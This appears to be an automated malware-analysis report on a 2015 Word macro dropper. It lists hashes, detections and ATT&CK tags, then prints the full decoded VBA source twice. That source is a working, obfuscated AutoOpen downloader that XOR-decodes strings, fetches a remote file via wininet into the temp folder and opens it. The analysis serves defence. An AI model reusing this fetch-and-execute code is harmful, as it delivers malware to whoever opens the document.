Office (OLE) malware analysis — malicious · a934018b9b6ff900

MALICIOUS

Office (OLE)

74.0 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05

MD5: 3c5b6d2f565762bb5af3847bc8e5a918 SHA-1: ee48e9c86c2443542e3c36f7bfab9e4d3ca3904a SHA-256: a934018b9b6ff900b391d18b4e9432b1d1322f6ca3bf08ca152472cc144560db

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize functions from wininet.dll, indicating an attempt to download and execute a secondary payload. The presence of an AutoOpen macro and the ClamAV detection as 'Doc.Dropper.Agent-1822040' strongly suggest this file is a dropper. The VBA code appears to be designed to fetch and run additional malicious content.

Heuristics 5

ClamAV: Doc.Dropper.Agent-1822040 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1822040
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set OBJECT099 = CreateObject _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8030 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8030 bytes
SHA-256: `2002b798fdd0c5b5674c335bd6e3164ec2f3aabc524b2b191824d843f2a670bb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() HAZ82771 End Sub Attribute VB_Name = "xsdasvsd" #If VBA7 And Win64 Then Public Declare PtrSafe Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long Public Declare PtrSafe Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare PtrSafe Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr #Else Public Declare Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long Public Declare Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long #End If Sub HAZ82771() SerpomPoPo ("LLLAK") End Sub Public Function ISTOP78(AASC21 As String, AASC22 As String) As String Dim UUUUS As Long Dim UUUUSO As String Dim UUUUS0 As Integer Dim UUUUS01 As Integer For UUUUS = 1 _ To _ ( _ getLeg _ (AASC22) _ / 2) UUUUS0 = Val("&H" & _ (Mid$(AASC22, _ (2 * UUUUS) - 1, 2))) UUUUS01 = Asc(Mid$(AASC21, _ ((UUUUS Mod Len(AASC21)) + 1), 1)) UUUUSO = UUUUSO + Chr(UUUUS0 Xor UUUUS01) Next UUUUS ISTOP78 = UUUUSO End Function Public Function getLeg(Papapa1 As String) As Integer getLeg = Len(Papapa1) End Function Attribute VB_Name = "HiMiMiIn" '* 1 Public Const HAZ82776 = "300C08011B452D1C5C1404000519041805" '2 Public Const HAZ82775 = "3F070E091C041C091D565F4D55430F590E1409" '3 Public Const HAZ82774 = "0B10191D4D44431B184F085715595F44450403411D1D0203084303460302401103064A09085801031F440D0C4C535943121309" '4 Public Const HAZ82773 = "30071F04071F05024B562B0A08083E0E18180941370F09010E19" '5 Public Const HAZ82772 = "mcdmmwkll,x" Attribute VB_Name = "HHAKKK" Sub _ SerpomPoPo(Trombon As String) '* -_-)(CAAdvVVDVSRU\|IU Dim _ OBJECT099 Set OBJECT099 = CreateObject _ (ISTOP78 _ (HAZ82772, HAZ82773)) Dim HAZ82768 Const HAZ82768ID = 2 Dim cddssejuuk As Integer For cddssejuuk = 0 To 0 If cddssejuuk = 5 Then End Next cddssejuuk Set HAZ82768 = OBJECT099.GetSpecialFolder _ (HAZ82768ID) Dim chdhaAAAAAi93 As Integer For chdhaAAAAAi93 = 0 To 0 If chdhaAAAAAi93 = 5 Then End Next chdhaAAAAAi93 HAZ82767 = HAZ82768 & ISTOP78 _ (HAZ82772, HAZ82775) Dim hiaopen847 As Integer For hiaopen847 = 0 To 0 If hiaopen847 = 5 Then End Next hiaopen847 Set OBJECT099 = CreateObject _ (ISTOP78 _ (HAZ82772, HAZ82773)) Dim BnBnHsssssgs346 As Integer For BnBnHsssssgs346 = 0 To 0 If BnBnHsssssgs346 = 5 Then End Next BnBnHsssssgs346 If OBJECT099.FileExists _ (HAZ82767) Then OBJECT099. _ DeleteFile HAZ82767 End If If HLUB3U3OP983(ISTOP78 _ (HAZ82772, HAZ82774), HAZ82767) Then End If Set SSSS = Nothing If OBJECT099. _ FileExists _ (HAZ82767) Then End If Set SASASA = CreateObject _ (ISTOP78 _ (HAZ82772, HAZ82776)) SASASA.Open HAZ82767 End Sub Attribute VB_Name = "SoaO" Attribute VB_Base = "0{77A09B64-6428-4F9C-A966-1AA1B7D7D76D}{70920E63-92B3-4621-A6FB-678A4BC13318}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Class2" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "VVDDD" Option Explicit Private Const CAS89K01Mmah872 = 8162 Private Const CAS89K01Mmah871 As String = "HnahHnsnak00" Private Const CAS89K01Mmah999 = 1 Private Const cCCc = &H4000000 Public Function HLUB3U3OP983(ByVal sURL As String, ByVal sFileName As String) As Boolean #If VBA7 And Win64 Then Dim HCDNNNDCNNDC2 As LongPtr, CAS89K01Mmah873 As LongPtr #Else Dim HCDNNNDCNNDC2 As Long, CAS89K01Mmah873 As Long #End If Dim CDSFDFD As Long Dim HCDNNNDCNNDC As String * CAS89K01Mmah872, CCEWGREHRHERHER33 As String Dim EFEWFWEFWEFWEF As Integer, lddta As Double HCDNNNDCNNDC2 = HLUB3U3OP983222(CAS89K01Mmah871, CAS89K01Mmah999, vbNullString, vbNullString, 0) If HCDNNNDCNNDC2 = 0 Then Exit Function End If CAS89K01Mmah873 = HLUB3U3OP9832(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0) If CAS89K01Mmah873 = 0 Then lddta = 0 Else KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD CCEWGREHRHERHER33 = HCDNNNDCNNDC Do While CDSFDFD <> 0 KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD Dim HhhhhHHuuU73772 As Integer For HhhhhHHuuU73772 = 0 To 0 If HhhhhHHuuU73772 = 5 Then End Next HhhhhHHuuU73772 CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(HCDNNNDCNNDC, 1, CDSFDFD) Loop lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile Open sFileName _ For Binary _ Access Write _ Lock Write _ As #EFEWFWEFWEFWEF Put #EFEWFWEFWEFWEF, _ , CCEWGREHRHERHER33 ': Dim ssdcdcdsDDDDD As Integer For ssdcdcdsDDDDD = 0 To 0 If ssdcdcdsDDDDD = 5 Then End Next ssdcdcdsDDDDD Close #EFEWFWEFWEFWEF End If HLUB3U3OP9832222 CAS89K01Mmah873 HLUB3U3OP9832222 HCDNNNDCNNDC2 CCEWGREHRHERHER33 = "" If lddta Then HLUB3U3OP983 = True End If End Function Attribute VB_Name = "A1" Attribute VB_Name = "A2" Attribute VB_Base = "0{C664A3F6-5364-4EC7-AC31-AC2FD6FDA9A4}{FE0ACA1C-83E3-4D10-9641-C615707BCC5E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "A3" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{9F39FB49-722F-4F81-8357-EBE584D86D38}{9BE7A8EB-B4FD-44AB-AE97-BEB270C60C8F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 2002b798fdd0c5b5674c335bd6e3164ec2f3aabc524b2b191824d843f2a670bb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
HAZ82771
End Sub

Attribute VB_Name = "xsdasvsd"

#If VBA7 And Win64 Then
Public Declare PtrSafe Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function HLUB3U3OP9832222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function HLUB3U3OP983222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function HLUB3U3OP9832 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If



Sub HAZ82771()
SerpomPoPo ("LLLAK")
End Sub

Public Function ISTOP78(AASC21 As String, AASC22 As String) As String
    Dim UUUUS As Long
    Dim UUUUSO As String
    Dim UUUUS0 As Integer
    Dim UUUUS01 As Integer
    For UUUUS = 1 _
    To _
    ( _
    getLeg _
    (AASC22) _
    / 2)
        UUUUS0 = Val("&H" & _
        (Mid$(AASC22, _
        (2 * UUUUS) - 1, 2)))
        UUUUS01 = Asc(Mid$(AASC21, _
        ((UUUUS Mod Len(AASC21)) + 1), 1))
        UUUUSO = UUUUSO + Chr(UUUUS0 Xor UUUUS01)
    Next UUUUS
   ISTOP78 = UUUUSO
End Function

Public Function getLeg(Papapa1 As String) As Integer
getLeg = Len(Papapa1)
End Function


Attribute VB_Name = "HiMiMiIn"
'* 1
Public Const HAZ82776 = "300C08011B452D1C5C1404000519041805"

'*2
Public Const HAZ82775 = "3F070E091C041C091D565F4D55430F590E1409"
'*3
Public Const HAZ82774 = "0B10191D4D44431B184F085715595F44450403411D1D0203084303460302401103064A09085801031F440D0C4C535943121309"
'*4
Public Const HAZ82773 = "30071F04071F05024B562B0A08083E0E18180941370F09010E19"
'*5
Public Const HAZ82772 = "mcdmmwkll,x"









Attribute VB_Name = "HHAKKK"


Sub _
SerpomPoPo(Trombon As String)
'* -_-)(CAAdvVVDVSRU|IU
Dim _
OBJECT099


Set OBJECT099 = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82773))
Dim HAZ82768
Const HAZ82768ID = 2
Dim cddssejuuk As Integer
For cddssejuuk = 0 To 0
If cddssejuuk = 5 Then End
Next cddssejuuk
Set HAZ82768 = OBJECT099.GetSpecialFolder _
(HAZ82768ID)
Dim chdhaAAAAAi93 As Integer
For chdhaAAAAAi93 = 0 To 0
If chdhaAAAAAi93 = 5 Then End
Next chdhaAAAAAi93
HAZ82767 = HAZ82768 & ISTOP78 _
(HAZ82772, HAZ82775)
Dim hiaopen847 As Integer
For hiaopen847 = 0 To 0
If hiaopen847 = 5 Then End
Next hiaopen847
Set OBJECT099 = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82773))
Dim BnBnHsssssgs346 As Integer
For BnBnHsssssgs346 = 0 To 0
If BnBnHsssssgs346 = 5 Then End
Next BnBnHsssssgs346
If OBJECT099.FileExists _
(HAZ82767) Then
OBJECT099. _
DeleteFile HAZ82767
End If
If HLUB3U3OP983(ISTOP78 _
(HAZ82772, HAZ82774), HAZ82767) Then
End If
Set SSSS = Nothing
If OBJECT099. _
FileExists _
(HAZ82767) Then
End If
Set SASASA = CreateObject _
(ISTOP78 _
(HAZ82772, HAZ82776))
SASASA.Open HAZ82767
End Sub


Attribute VB_Name = "SoaO"
Attribute VB_Base = "0{77A09B64-6428-4F9C-A966-1AA1B7D7D76D}{70920E63-92B3-4621-A6FB-678A4BC13318}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "VVDDD"
Option Explicit


Private Const CAS89K01Mmah872 = 8162
Private Const CAS89K01Mmah871 As String = "HnahHnsnak00"
Private Const CAS89K01Mmah999 = 1
Private Const cCCc = &H4000000
Public Function HLUB3U3OP983(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim HCDNNNDCNNDC2 As LongPtr, CAS89K01Mmah873 As LongPtr
    #Else
        Dim HCDNNNDCNNDC2 As Long, CAS89K01Mmah873 As Long
    #End If
    Dim CDSFDFD As Long
    Dim HCDNNNDCNNDC As String * CAS89K01Mmah872, CCEWGREHRHERHER33 As String
    Dim EFEWFWEFWEFWEF As Integer, lddta As Double
    HCDNNNDCNNDC2 = HLUB3U3OP983222(CAS89K01Mmah871, CAS89K01Mmah999, vbNullString, vbNullString, 0)
    If HCDNNNDCNNDC2 = 0 Then
        Exit Function
    End If
    CAS89K01Mmah873 = HLUB3U3OP9832(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
    If CAS89K01Mmah873 = 0 Then
        lddta = 0
    Else
        KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD
        CCEWGREHRHERHER33 = HCDNNNDCNNDC
        Do While CDSFDFD <> 0
            KOOOODAAAAA1 CAS89K01Mmah873, HCDNNNDCNNDC, CAS89K01Mmah872, CDSFDFD
            
            Dim HhhhhHHuuU73772 As Integer
For HhhhhHHuuU73772 = 0 To 0
If HhhhhHHuuU73772 = 5 Then End
Next HhhhhHHuuU73772
            
            CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
        Loop
        lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
        Open sFileName _
        For Binary _
        Access Write _
        Lock Write _
        As #EFEWFWEFWEFWEF
        Put #EFEWFWEFWEFWEF, _
        , CCEWGREHRHERHER33
        ':
        
        Dim ssdcdcdsDDDDD As Integer
For ssdcdcdsDDDDD = 0 To 0
If ssdcdcdsDDDDD = 5 Then End
Next ssdcdcdsDDDDD
        Close #EFEWFWEFWEFWEF
    End If
    HLUB3U3OP9832222 CAS89K01Mmah873
    HLUB3U3OP9832222 HCDNNNDCNNDC2
    CCEWGREHRHERHER33 = ""
    If lddta Then
        HLUB3U3OP983 = True
    End If
End Function



Attribute VB_Name = "A1"

Attribute VB_Name = "A2"
Attribute VB_Base = "0{C664A3F6-5364-4EC7-AC31-AC2FD6FDA9A4}{FE0ACA1C-83E3-4D10-9641-C615707BCC5E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "A3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9F39FB49-722F-4F81-8357-EBE584D86D38}{9BE7A8EB-B4FD-44AB-AE97-BEB270C60C8F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.